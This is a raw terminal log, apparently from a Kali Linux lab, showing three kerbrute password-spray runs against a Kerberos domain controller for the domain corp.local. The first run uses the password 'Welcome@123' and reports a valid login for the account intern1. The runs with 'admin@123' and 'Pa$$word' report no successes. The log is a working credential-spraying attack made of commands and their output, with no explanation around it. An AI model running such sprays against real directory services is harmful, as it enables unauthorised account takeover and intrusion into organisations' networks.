└─$ kerbrute passwordspray kerbrute_users.txt \
  -d corp.local \
  --dc 192.168.100.10 \
  "Welcome@123"                           

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/27/25 - Ronnie Flathers @ropnop

2025/12/27 00:53:17 >  Using KDC(s):
2025/12/27 00:53:17 >   192.168.100.10:88

2025/12/27 00:53:17 >  [+] VALID LOGIN:  intern1@corp.local:Welcome@123
2025/12/27 00:53:17 >  Done! Tested 2 logins (1 successes) in 0.068 seconds
                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ kerbrute passwordspray kerbrute_users.txt \
  -d corp.local \
  --dc 192.168.100.10 \
  "admin@123"  

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/27/25 - Ronnie Flathers @ropnop

2025/12/27 00:56:07 >  Using KDC(s):
2025/12/27 00:56:07 >   192.168.100.10:88

2025/12/27 00:56:07 >  Done! Tested 2 logins (0 successes) in 0.107 seconds
                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ kerbrute passwordspray kerbrute_users.txt \
  -d corp.local \
  --dc 192.168.100.10 \
  "Pa$$word" 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/27/25 - Ronnie Flathers @ropnop

2025/12/27 00:56:46 >  Using KDC(s):
2025/12/27 00:56:46 >   192.168.100.10:88

2025/12/27 00:56:46 >  Done! Tested 2 logins (0 successes) in 0.064 seconds